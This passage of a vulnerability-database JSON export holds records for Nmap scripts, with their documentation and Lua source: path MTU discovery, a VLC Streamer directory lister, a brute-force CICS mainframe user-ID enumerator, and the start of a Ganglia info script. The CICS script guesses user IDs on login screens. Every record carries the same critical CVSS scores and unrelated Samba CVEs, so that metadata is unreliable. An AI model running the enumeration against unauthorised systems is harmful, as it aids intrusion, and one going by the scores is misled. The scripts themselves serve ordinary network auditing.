\n\n * the MTU of the outgoing interface is used as a starting point, and \n * we can jump down the list when an intermediate router sending a \"can't fragment\" message includes its next hop MTU (as described in RFC 1191 and required by RFC 1812)\n\n## Example Usage \n \n \n nmap --script path-mtu target\n \n\n## Script Output \n \n \n Host script results:\n |_path-mtu: 1492 <= PMTU < 1500\n \n Host script results:\n |_path-mtu: PMTU == 1006\n\n## Requires \n\n * [ipOps](<../lib/ipOps.html>)\n * [math](<>)\n * [nmap](<../lib/nmap.html>)\n * [packet](<../lib/packet.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-08-24T01:47:12", "type": "nmap", "title": "path-mtu NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-08-15T07:26:00", "id": "NMAP:PATH-MTU.NSE", "href": "https://nmap.org/nsedoc/scripts/path-mtu.html", "sourceData": "local ipOps = require \"ipOps\"\nlocal math = require \"math\"\nlocal nmap = require \"nmap\"\nlocal packet = require \"packet\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nPerforms simple Path MTU Discovery to target hosts.\n\nTCP or UDP packets are sent to the host with the DF (don't fragment) bit set\nand with varying amounts of data. If an ICMP Fragmentation Needed is received,\nor no reply is received after retransmissions, the amount of data is lowered\nand another packet is sent. This continues until (assuming no errors occur) a\nreply from the final host is received, indicating the packet reached the host\nwithout being fragmented.\n\nNot all MTUs are attempted so as to not expend too much time or network\nresources. Currently the relatively short list of MTUs to try contains\nthe plateau values from Table 7-1 in RFC 1191, \"Path MTU Discovery\".\nUsing these values significantly cuts down the MTU search space. On top\nof that, this list is rarely traversed in whole because:\n* the MTU of the outgoing interface is used as a starting point, and\n* we can jump down the list when an intermediate router sending a \"can't fragment\" message includes its next hop MTU (as described in RFC 1191 and required by RFC 1812)\n]]\n\n---\n-- @usage\n-- nmap --script path-mtu target\n--\n-- @output\n-- Host script results:\n-- |_path-mtu: 1492 <= PMTU < 1500\n--\n-- Host script results:\n-- |_path-mtu: PMTU == 1006\n\nauthor = \"Kris Katterjohn\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"safe\", \"discovery\"}\n\n\nlocal IPPROTO_ICMP = packet.IPPROTO_ICMP\nlocal IPPROTO_TCP = packet.IPPROTO_TCP\nlocal IPPROTO_UDP = packet.IPPROTO_UDP\n\n-- Number of times to retransmit for no reply before dropping to\n-- another MTU value\nlocal RETRIES = 1\n\n-- RFC 1191, Table 7-1: Plateaus. Even the massive MTU values are\n-- here since we skip down the list based on the outgoing interface\n-- so its no harm.\nlocal MTUS = {\n 65535,\n 32000,\n 17914,\n 8166,\n 4352,\n 2002,\n 1492,\n 1006,\n 508,\n 296,\n 68\n}\n\n-- Find the index in MTUS{} to use based on the MTU +new+. If +new+ is in\n-- between values in MTUS, then insert it into the table appropriately.\nlocal searchmtu = function(cidx, new)\n if new == 0 then\n return cidx\n end\n\n while cidx <= #MTUS do\n if new >= MTUS[cidx] then\n if new ~= MTUS[cidx] then\n table.insert(MTUS, cidx, new)\n end\n return cidx\n end\n cidx = cidx + 1\n end\n return cidx\nend\n\nlocal dport = function(ip)\n if ip.ip_p == IPPROTO_TCP then\n return ip.tcp_dport\n elseif ip.ip_p == IPPROTO_UDP then\n return ip.udp_dport\n end\nend\n\nlocal sport = function(ip)\n if ip.ip_p == IPPROTO_TCP then\n return ip.tcp_sport\n elseif ip.ip_p == IPPROTO_UDP then\n return ip.udp_sport\n end\nend\n\n-- Checks how we should react to this packet\nlocal checkpkt = function(reply, orig)\n local ip = packet.Packet:new(reply, reply:len())\n\n if ip.ip_p == IPPROTO_ICMP then\n if ip.icmp_type ~= 3 then\n return \"recap\"\n end\n -- Port Unreachable\n if ip.icmp_code == 3 then\n local is = ip.buf:sub(ip.icmp_offset + 9)\n local ip2 = packet.Packet:new(is, is:len())\n\n -- Check sent packet against ICMP payload\n if ip2.ip_p ~= IPPROTO_UDP or\n ip2.ip_p ~= orig.ip_p or\n ip2.ip_bin_src ~= orig.ip_bin_src or\n ip2.ip_bin_dst ~= orig.ip_bin_dst or\n sport(ip2) ~= sport(orig) or\n dport(ip2) ~= dport(orig) then\n return \"recap\"\n end\n\n return \"gotreply\"\n end\n -- Frag needed, DF set\n if ip.icmp_code == 4 then\n local val = ip:u16(ip.icmp_offset + 6)\n return \"nextmtu\", val\n end\n return \"recap\"\n end\n\n if ip.ip_p ~= orig.ip_p or\n ip.ip_bin_src ~= orig.ip_bin_dst or\n ip.ip_bin_dst ~= orig.ip_bin_src or\n dport(ip) ~= sport(orig) or\n sport(ip) ~= dport(orig) then\n return \"recap\"\n end\n\n return \"gotreply\"\nend\n\n-- This is all we can use since we can get various protocols back from\n-- different hosts\nlocal check = function(layer3)\n local ip = packet.Packet:new(layer3, layer3:len())\n return ip.ip_bin_dst\nend\n\n-- Updates a packet's info and calculates checksum\nlocal updatepkt = function(ip)\n if ip.ip_p == IPPROTO_TCP then\n ip:tcp_set_sport(math.random(0x401, 0xffff))\n ip:tcp_set_seq(math.random(1, 0x7fffffff))\n ip:tcp_count_checksum()\n elseif ip.ip_p == IPPROTO_UDP then\n ip:udp_set_sport(math.random(0x401, 0xffff))\n ip:udp_set_length(ip.ip_len - ip.ip_hl * 4)\n ip:udp_count_checksum()\n end\n ip:ip_count_checksum()\nend\n\n-- Set up packet header and data to satisfy a certain MTU\nlocal setmtu = function(pkt, mtu)\n if pkt.ip_len < mtu then\n pkt.buf = pkt.buf .. string.rep(\"\\0\", mtu - pkt.ip_len)\n else\n pkt.buf = pkt.buf:sub(1, mtu)\n end\n\n pkt:ip_set_len(mtu)\n pkt.packet_length = mtu\n updatepkt(pkt)\nend\n\nlocal basepkt = function(proto)\n local ibin = stdnse.fromhex(\n \"4500 0014 0000 4000 8000 0000 0000 0000 0000 0000\"\n )\n local tbin = stdnse.fromhex(\n \"0000 0000 0000 0000 0000 0000 6002 0c00 0000 0000 0204 05b4\"\n )\n local ubin = stdnse.fromhex(\n \"0000 0000 0800 0000\"\n )\n\n if proto == IPPROTO_TCP then\n return ibin .. tbin\n elseif proto == IPPROTO_UDP then\n return ibin .. ubin\n end\nend\n\n-- Creates a Packet object for the given proto and port\nlocal genericpkt = function(host, proto, port)\n local pkt = basepkt(proto)\n local ip = packet.Packet:new(pkt, pkt:len())\n\n ip:ip_set_bin_src(host.bin_ip_src)\n ip:ip_set_bin_dst(host.bin_ip)\n\n ip:set_u8(ip.ip_offset + 9, proto)\n ip.ip_p = proto\n\n ip:ip_set_len(pkt:len())\n\n if proto == IPPROTO_TCP then\n ip:tcp_parse(false)\n ip:tcp_set_dport(port)\n elseif proto == IPPROTO_UDP then\n ip:udp_parse(false)\n ip:udp_set_dport(port)\n end\n\n updatepkt(ip)\n\n return ip\nend\n\nlocal ipproto = function(p)\n if p == \"tcp\" then\n return IPPROTO_TCP\n elseif p == \"udp\" then\n return IPPROTO_UDP\n end\n return -1\nend\n\n-- Determines how to probe\nlocal getprobe = function(host)\n local combos = {\n { \"tcp\", \"open\" },\n { \"tcp\", \"closed\" },\n -- udp/open probably only happens when Nmap sends proper\n -- payloads, which doesn't happen in here\n { \"udp\", \"closed\" }\n }\n local proto = nil\n local port = nil\n\n for _, c in ipairs(combos) do\n port = nmap.get_ports(host, nil, c[1], c[2])\n if port then\n proto = c[1]\n break\n end\n end\n\n return proto, port\nend\n\n-- Sets necessary probe data in registry\nlocal setreg = function(host, proto, port)\n host.registry['pathmtuprobe'] = {\n ['proto'] = proto,\n ['port'] = port\n }\nend\n\nhostrule = function(host)\n if not nmap.is_privileged() then\n nmap.registry[SCRIPT_NAME] = nmap.registry[SCRIPT_NAME] or {}\n if not nmap.registry[SCRIPT_NAME].rootfail then\n stdnse.verbose1(\"not running for lack of privileges.\")\n end\n nmap.registry[SCRIPT_NAME].rootfail = true\n return nil\n end\n\n if nmap.address_family() ~= 'inet' then\n stdnse.debug1(\"is IPv4 compatible only.\")\n return false\n end\n if not (host.interface and host.interface_mtu) then\n return false\n end\n local proto, port = getprobe(host)\n if not (proto and port) then\n return false\n end\n setreg(host, proto, port.number)\n return true\nend\n\naction = function(host)\n local m, r\n local gotit = false\n local mtuset\n local sock = nmap.new_dnet()\n local pcap = nmap.new_socket()\n local proto = host.registry['pathmtuprobe']['proto']\n local port = host.registry['pathmtuprobe']['port']\n local saddr = ipOps.str_to_ip(host.bin_ip_src)\n local daddr = ipOps.str_to_ip(host.bin_ip)\n local try = nmap.new_try()\n local status, pkt, ip\n\n try(sock:ip_open())\n\n try = nmap.new_try(function() sock:ip_close() end)\n\n pcap:pcap_open(host.interface, 104, false, \"dst host \" .. saddr .. \" and (icmp or (\" .. proto .. \" and src host \" .. daddr .. \" and src port \" .. port .. \"))\")\n\n -- Since we're sending potentially large amounts of data per packet,\n -- simply bump up the host's calculated timeout value. Most replies\n -- should come from routers along the path, fragmentation reassembly\n -- times isn't an issue and the large amount of data is only traveling\n -- in one direction; still, we want a response from the target so call\n -- it 1.5*timeout to play it safer.\n pcap:set_timeout(1.5 * host.times.timeout * 1000)\n\n m = searchmtu(1, host.interface_mtu)\n\n mtuset = MTUS[m]\n\n local pkt = genericpkt(host, ipproto(proto), port)\n\n while m <= #MTUS do\n setmtu(pkt, MTUS[m])\n\n r = 0\n status = false\n while true do\n if not status then\n if not sock:ip_send(pkt.buf, host) then\n -- Got a send error, perhaps EMSGSIZE\n -- when we don't know our interface's\n -- MTU. Drop an MTU and keep trying.\n break\n end\n end\n\n local test = pkt.ip_bin_src\n local status, length, _, layer3 = pcap:pcap_receive()\n while status and test ~= check(layer3) do\n status, length, _, layer3 = pcap:pcap_receive()\n end\n\n if status then\n local t, v = checkpkt(layer3, pkt)\n if t == \"gotreply\" then\n gotit = true\n break\n elseif t == \"recap\" then\n elseif t == \"nextmtu\" then\n if v == 0 then\n -- Router didn't send its\n -- next-hop MTU. Just drop\n -- a level.\n break\n end\n -- Lua's lack of a continue statement\n -- for loop control sucks, so dec m\n -- here as it's inc'd below. Ugh.\n m = searchmtu(m, v) - 1\n mtuset = v\n break\n end\n else\n if r >= RETRIES then\n break\n end\n r = r + 1\n end\n end\n\n if gotit then\n break\n end\n\n m = m + 1\n end\n\n pcap:close()\n sock:ip_close()\n\n if not gotit then\n if nmap.debugging() > 0 then\n return \"Error: Unable to determine PMTU (no replies)\"\n end\n return\n end\n\n if MTUS[m] == mtuset then\n return \"PMTU == \" .. MTUS[m]\n elseif m == 1 then\n return \"PMTU >= \" .. MTUS[m]\n else\n return \"\" .. MTUS[m] .. \" <= PMTU < \" .. MTUS[m - 1]\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:42:32", "description": "Connects to a VLC Streamer helper service and lists directory contents. The VLC Streamer helper service is used by the iOS VLC Streamer application to enable streaming of multimedia content from the remote server to the device.\n\n## Script Arguments \n\n#### http-vlcstreamer-ls.dir \n\ndirectory to list (default: /)\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 54340 --script http-vlcstreamer-ls <ip>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 54340/tcp open unknown\n | http-vlcstreamer-ls:\n | /Applications\n | /Developer\n | /Library\n | /Network\n | /Pictures\n | /System\n | /User Guides And Information\n | /Users\n | /Volumes\n | /bin\n | /bundles\n | /cores\n | /dev\n | /etc\n | /home\n | /mach_kernel\n | /net\n | /opt\n | /private\n | /sbin\n | /tmp\n | /usr\n |_ /var\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [json](<../lib/json.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-04-08T23:04:18", "type": "nmap", "title": "http-vlcstreamer-ls NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:HTTP-VLCSTREAMER-LS.NSE", "href": "https://nmap.org/nsedoc/scripts/http-vlcstreamer-ls.html", "sourceData": "local http = require \"http\"\nlocal json = require \"json\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nConnects to a VLC Streamer helper service and lists directory contents. The\nVLC Streamer helper service is used by the iOS VLC Streamer application to\nenable streaming of multimedia content from the remote server to the device.\n]]\n\n---\n-- @usage\n-- nmap -p 54340 --script http-vlcstreamer-ls <ip>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 54340/tcp open unknown\n-- | http-vlcstreamer-ls:\n-- | /Applications\n-- | /Developer\n-- | /Library\n-- | /Network\n-- | /Pictures\n-- | /System\n-- | /User Guides And Information\n-- | /Users\n-- | /Volumes\n-- | /bin\n-- | /bundles\n-- | /cores\n-- | /dev\n-- | /etc\n-- | /home\n-- | /mach_kernel\n-- | /net\n-- | /opt\n-- | /private\n-- | /sbin\n-- | /tmp\n-- | /usr\n-- |_ /var\n--\n-- @args http-vlcstreamer-ls.dir directory to list (default: /)\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\nportrule = shortport.port_or_service(54340, \"vlcstreamer\", \"tcp\")\n\nlocal arg_dir = stdnse.get_script_args(SCRIPT_NAME .. \".dir\") or \"/\"\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n\n local response = http.get(host, port, (\"/secure?command=browse&dir=%s\"):format(arg_dir))\n\n if ( response.status ~= 200 or not(response.body) or 0 == #response.body ) then\n if ( response.status == 401 ) then\n return fail(\"Server requires authentication\")\n else\n return\n end\n end\n\n local status, parsed = json.parse(response.body)\n if ( not(status) ) then\n return fail(\"Failed to parse response\")\n end\n\n if ( parsed.errorMessage ) then\n return fail(parsed.errorMessage)\n end\n\n local output = {}\n for _, entry in pairs(parsed.files or {}) do\n table.insert(output,entry.path)\n end\n table.sort(output, function(a,b) return a<b end)\n return stdnse.format_output(true, output)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:28", "description": "CICS User ID enumeration script for the CESL/CESN Login screen.\n\n## Script Arguments \n\n#### cics-user-enum.commands \n\nCommands in a semi-colon separated list needed to access CICS. Defaults to `CICS`.\n\n#### idlist \n\nPath to list of transaction IDs. Defaults to the list of CICS transactions from IBM.\n\n#### cics-user-enum.transaction \n\nBy default this script uses the `CESL` transaction. on some systems the transactio ID `CESN` is needed. Use this argument to change the logon transaction ID.\n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script=cics-user-enum -p 23 <targets>\n \n nmap --script=cics-user-enum --script-args userdb=users.txt,\n cics-user-enum.commands=\"exit;logon applid(cics42)\" -p 23 <targets>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 23/tcp open tn3270\n | cics-user-enum:\n | Accounts:\n | PLAGUE: Valid - CICS User ID\n |_ Statistics: Performed 31 guesses in 114 seconds, average tps: 0\n \n\n## Requires \n\n * [stdnse](<../lib/stdnse.html>)\n * [shortport](<../lib/shortport.html>)\n * [tn3270](<../lib/tn3270.html>)\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [unpwdb](<../lib/unpwdb.html>)\n * [string](<>)\n * [stringaux](<../lib/stringaux.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-08T21:27:09", "type": "nmap", "title": "cics-user-enum NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-03-21T04:07:55", "id": "NMAP:CICS-USER-ENUM.NSE", "href": "https://nmap.org/nsedoc/scripts/cics-user-enum.html", "sourceData": "local stdnse = require \"stdnse\"\nlocal shortport = require \"shortport\"\nlocal tn3270 = require \"tn3270\"\nlocal brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal unpwdb = require \"unpwdb\"\nlocal string = require \"string\"\nlocal stringaux = require \"stringaux\"\n\ndescription = [[\nCICS User ID enumeration script for the CESL/CESN Login screen.\n]]\n\n---\n-- @args idlist Path to list of transaction IDs.\n-- Defaults to the list of CICS transactions from IBM.\n-- @args cics-user-enum.commands Commands in a semi-colon separated list needed\n-- to access CICS. Defaults to <code>CICS</code>.\n-- @args cics-user-enum.transaction By default this script uses the <code>CESL</code> transaction.\n-- on some systems the transactio ID <code>CESN</code> is needed. Use this argument to change the\n-- logon transaction ID.\n--\n-- @usage\n-- nmap --script=cics-user-enum -p 23 <targets>\n--\n-- nmap --script=cics-user-enum --script-args userdb=users.txt,\n-- cics-user-enum.commands=\"exit;logon applid(cics42)\" -p 23 <targets>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 23/tcp open tn3270\n-- | cics-user-enum:\n-- | Accounts:\n-- | PLAGUE: Valid - CICS User ID\n-- |_ Statistics: Performed 31 guesses in 114 seconds, average tps: 0\n--\n-- @changelog\n-- 2016-08-29 - v0.1 - created by Soldier of Fortran\n-- 2016-12-19 - v0.2 - Added RACF support\n-- 2019-02-01 - v0.3 - Disabled TN3270E support\n--\n-- @author Philip Young\n-- @copyright Same as Nmap--See https://nmap.org/book/man-legal.html\n--\n\nauthor = \"Philip Young aka Soldier of Fortran\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"brute\"}\nportrule = shortport.port_or_service({23,992}, \"tn3270\")\n\nDriver = {\n new = function(self, host, port, options)\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.host = host\n o.port = port\n o.options = options\n o.tn3270 = tn3270.Telnet:new()\n o.tn3270:disable_tn3270e()\n return o\n end,\n connect = function( self )\n local status, err = self.tn3270:initiate(self.host,self.port)\n self.tn3270:get_screen_debug(2)\n if not status then\n stdnse.debug(\"Could not initiate TN3270: %s\", err )\n return false\n end\n return true\n end,\n disconnect = function( self )\n self.tn3270:disconnect()\n self.tn3270 = nil\n return true\n end,\n login = function (self, user, pass) -- pass is actually the UserID we want to try\n local commands = self.options['commands']\n local transaction = self.options['trn']\n local timeout = 300\n local max_blank = 1\n local loop = 1\n local err\n stdnse.debug(2,\"Getting to CICS\")\n local run = stringaux.strsplit(\";%s*\", commands)\n for i = 1, #run do\n stdnse.debug(1,\"Issuing Command (#%s of %s): %s\", i, #run ,run[i])\n self.tn3270:send_cursor(run[i])\n self.tn3270:get_all_data()\n self.tn3270:get_screen_debug(2)\n end\n -- Are we at the logon transaction?\n if not (self.tn3270:find('SIGN ON TO CICS') and self.tn3270:find(\"Signon to CICS\")) then\n -- We might be at some weird screen, lets try and exit it then clear it out\n stdnse.debug(2,\"Sending: F3\")\n self.tn3270:send_pf(3) -- send F3\n self.tn3270:get_all_data()\n stdnse.debug(2,\"Clearing the Screen\")\n self.tn3270:send_clear()\n self.tn3270:get_all_data()\n self.tn3270:get_screen_debug(2)\n stdnse.debug(2,\"Sending Transaction ID: %s\", transaction)\n self.tn3270:send_cursor(transaction)\n self.tn3270:get_all_data()\n -- Have we encoutered a slow system?\n if self.tn3270:isClear() then\n self.tn3270:get_all_data(1000)\n end\n self.tn3270:get_screen_debug(2)\n end\n -- At this point we MUST be at CESL/CESN to try accounts.\n -- If we're not then we quit with an error\n if not (self.tn3270:find('Type your userid and password')) then\n local err = brute.Error:new( \"Can't get to Transaction CESN\")\n err:setRetry( true )\n return false, err\n end\n\n -- Ok we're good we're at CESL/CESN. Enter the USERID.\n stdnse.verbose(\"Trying User ID: %s\", pass)\n self.tn3270:send_cursor(pass)\n self.tn3270:get_all_data()\n stdnse.debug(2,\"Screen Received for User ID: %s\", pass)\n self.tn3270:get_screen_debug(2)\n if self.tn3270:find('TSS7145E') or\n self.tn3270:find('ACF01004') or\n self.tn3270:find('DFHCE3530') then\n -- known invalid userid messages\n -- TopSecret: TSS7145E\n -- ACF2: ACF01004\n -- RACF: DFHCE3530\n stdnse.debug(\"Invalid CICS User ID: %s\", string.upper(pass))\n return false, brute.Error:new( \"Incorrect CICS User ID\" )\n elseif self.tn3270:find('TSS7102E') or\n self.tn3270:find('ACF01012') or\n self.tn3270:find('DFHCE3523') then\n -- TopSecret: TSS7102E Password Missing\n -- ACF2: ACF01012 PASSWORD NOT MATCHED\n -- RACF: DFHCE3523 Please type your password.\n stdnse.verbose(\"Valid CICS User ID: %s\", string.upper(pass))\n return true, creds.Account:new(\"CICS User\", string.upper(pass), creds.State.VALID)\n else\n stdnse.verbose(\"Valid(?) CICS User ID: %s\", string.upper(pass))\n -- The user may be valid for another reason, lets store that reason.\n stdnse.verbose(2,\"User: \" .. user .. \" MSG:\" .. self.tn3270:get_screen():sub(2,80))\n return true, creds.Account:new(\"CICS User: \".. string.upper(pass),'Reason: ' .. self.tn3270:get_screen():sub(2,80), creds.State.VALID)\n end\n\n return false, brute.Error:new(\"Something went wrong, we didn't get a proper response\")\n end\n}\n\n--- Tests the target to see if we can even get to CICS\n--\n-- @param host host NSE object\n-- @param port port NSE object\n-- @param commands optional script-args of commands to use to get to CICS\n-- @return status true on success, false on failure\n\nlocal function cics_test( host, port, commands, transaction )\n stdnse.verbose(2,\"Checking for CICS Login Page\")\n local tn = tn3270.Telnet:new()\n tn:disable_tn3270e()\n local status, err = tn:initiate(host,port)\n local cesl = false -- initially we're not at CICS\n if not status then\n stdnse.debug(\"Could not initiate TN3270: %s\", err )\n return false\n end\n tn:get_screen_debug(2) -- prints TN3270 screen to debug\n stdnse.debug(\"Getting to CICS\")\n local run = stringaux.strsplit(\";%s*\", commands)\n for i = 1, #run do\n stdnse.debug(1,\"Issuing Command (#%s of %s): %s\", i, #run ,run[i])\n tn:send_cursor(run[i])\n tn:get_all_data()\n tn:get_screen_debug(2)\n end\n tn:get_all_data()\n tn:get_screen_debug(2) -- for debug purposes\n -- We should now be at CICS. Check if we're already at the logon screen\n if tn:find('Type your userid and password') then\n stdnse.verbose(2,\"At CICS Login Transaction\")\n tn:disconnect()\n return true\n end\n -- Uh oh. We're not at the logon screen. Now we need to send:\n -- * F3 to exit the CICS program\n -- * CLEAR (a tn3270 command) to clear the screen.\n -- (you need to clear before sending a transaction ID)\n -- * a known default CICS transaction ID with predictable outcome\n -- (CESF with 'Sign-off is complete.' as the result)\n -- to confirm that we were in CICS. If so we return true\n -- otherwise we return false\n local count = 1\n while not tn:isClear() and count < 6 do\n -- some systems will just kick you off others are slow in responding\n -- this loop continues to try getting out of whatever transaction 5 times. If it can't\n -- then we probably weren't in CICS to begin with.\n stdnse.debug(2,\"Sending: F3\")\n tn:send_pf(3) -- send F3\n tn:get_all_data()\n stdnse.debug(2,\"Clearing the Screen\")\n tn:send_clear()\n tn:get_all_data()\n tn:get_screen_debug(2)\n count = count + 1\n end\n if count == 5 then\n return false, 'Could not get to CICS after 5 attempts. Is this even CICS?'\n end\n stdnse.debug(2,\"Sending %s\", transaction)\n tn:send_cursor(transaction)\n tn:get_all_data()\n if tn:isClear() then\n tn:get_all_data(1000)\n end\n tn:get_screen_debug(2)\n\n if tn:find('SIGN ON TO CICS') or tn:find(\"Signon to CICS\") then\n stdnse.verbose(2,\"At CICS Login Transaction (%s)\", transaction)\n tn:disconnect()\n return true\n end\n tn:disconnect()\n return false, 'Could not get to '.. transaction ..' (CICS Logon Screen)'\nend\n\n-- Filter iterator for unpwdb\n-- IDs are limited to 8 alpha numeric and @, #, $ and can't start with a number\n-- pattern:\n-- ^%D = The first char must NOT be a digit\n-- [%w@#%$] = All letters including the special chars @, #, and $.\nlocal valid_name = function(x)\n return (string.len(x) <= 8 and string.match(x,\"^%D+[%w@#%$]\"))\nend\n\naction = function(host, port)\n local commands = stdnse.get_script_args(SCRIPT_NAME .. '.commands') or \"cics\"\n local transaction = stdnse.get_script_args(SCRIPT_NAME .. '.transaction') or \"CESL\"\n local cicstst, err = cics_test(host, port, commands, transaction)\n if cicstst then\n local options = { commands = commands, trn = transaction }\n stdnse.debug(\"Starting CICS User ID Enumeration\")\n local engine = brute.Engine:new(Driver, host, port, options)\n engine.options.script_name = SCRIPT_NAME\n engine:setPasswordIterator(unpwdb.filter_iterator(brute.usernames_iterator(),valid_name))\n engine.options.passonly = true\n engine.options:setTitle(\"CICS User ID\")\n local status, result = engine:start()\n return result\n else\n return err\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:08", "description": "Retrieves system information (OS version, available memory, etc.) from a listening Ganglia Monitoring Daemon or Ganglia Meta Daemon. \n\nGanglia is a scalable distributed monitoring system for high-performance computing systems such as clusters and Grids. The information retrieved includes HDD size, available memory, OS version, architecture (and more) from each of the systems in each of the clusters in the grid. \n\nFor more information about Ganglia, see: \n\n * <http://ganglia.sourceforge.net/>\n * <http://en.wikipedia.org/wiki/Ganglia_(software)#Ganglia_Monitoring_Daemon_.28gmond.29>\n * <http://en.wikipedia.org/wiki/Ganglia_(software)#Ganglia_Meta_Daemon_.28gmetad.29>\n\n## Script Arguments \n\n#### ganglia-info.bytes \n\nSet the number of bytes to retrieve. The default value is 1000000. This should be enough for a grid of more than 100 hosts. About 5KB-10KB of data is returned for each host in the cluster.\n\n#### ganglia-info.timeout \n\nSet the timeout in seconds. The default value is 30.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script ganglia-info --script-args ganglia-info.timeout=60,ganglia-info.bytes=1000000 -p <port> <target>\n \n\n## Script Output \n \n \n 8649/tcp open unknown syn-ack\n | ganglia-info:\n | Ganglia Version: 3.1.7\n | Cluster 1:\n | Name: unspecified\n | Owner: unspecified\n | Host 1:\n | Name: sled9735.sd.dreamhost.com\n | IP: 10.208.42.221\n | load_one: 0.53\n | mem_total: 24685564KB\n | 